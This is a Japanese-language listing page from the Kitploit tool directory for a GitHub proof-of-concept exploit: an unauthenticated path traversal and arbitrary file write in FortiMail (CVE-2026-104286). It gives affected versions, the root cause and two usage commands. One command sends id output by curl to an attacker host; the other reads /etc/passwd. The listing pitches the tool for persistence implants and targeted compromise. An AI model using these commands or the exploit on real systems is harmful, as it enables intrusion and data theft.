Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-104286-POC — FortiMailにおけるCVE-2026-104286の未認証パストラバーサルエクスプロイト。レッドチーム評価と永続化のために、細工されたHTTP/HTTPSリクエストを介して任意のファイルを書き込む。 | Kitploit
ツール/GitHubGitHub/shadowforge-cyber/cve-2026-104286-poc
永続化メカニズム脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテストレッドチーミングペイロード開発

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHub
shadowforge-cyber/cve-2026-104286-poc

CVE-2026-104286-POC

FortiMailにおけるCVE-2026-104286の未認証パストラバーサルエクスプロイト。レッドチーム評価と永続化のために、細工されたHTTP/HTTPSリクエストを介して任意のファイルを書き込む。

リポジトリを見る
1日前未レビュー

FortiMail CVE-2026-104286 パストラバーサルエクスプロイト

概要

FortiMail における CVE-2026-104286 の高度な未認証リモート任意ファイル書き込みエクスプロイト。細工された HTTP/HTTPS リクエストが Web クライアントのパスサニタイズをバイパスし、基盤 OS 上での任意ファイル作成を可能にします。レッドチーム評価、永続化インプラント、および FortiMail デプロイメントへの標的型侵害に使用されます。

影響を受けるバージョン

FortiMail 8.0.x (<8.0.2)、7.6.x (<7.6.6)、7.4.x (<7.4.8)、7.2.x (<7.2.9)、7.0.x (<7.0.10)

根本原因

パス名の制限されたディレクトリへの不適切な制限 (CWE-22)。HTTP/HTTPS API ハンドラー内のファイルアップロードパスにおける ../ シーケンスの検証が欠如しており、意図されたアップロードディレクトリ外へのトラバーサルが可能になります。

使用方法

$ python3 cve-2026-104286.py -u http://target:443 -c "curl -s http://attacker:80/$(id)"
$ python3 cve-2026-104286.py -u http://target:443 -l /etc/passwd -o /var/tmp/.hacked
image

エクスプロイト

エクスプロイトに関するお問い合わせ: [email protected]

ツールをダウンロード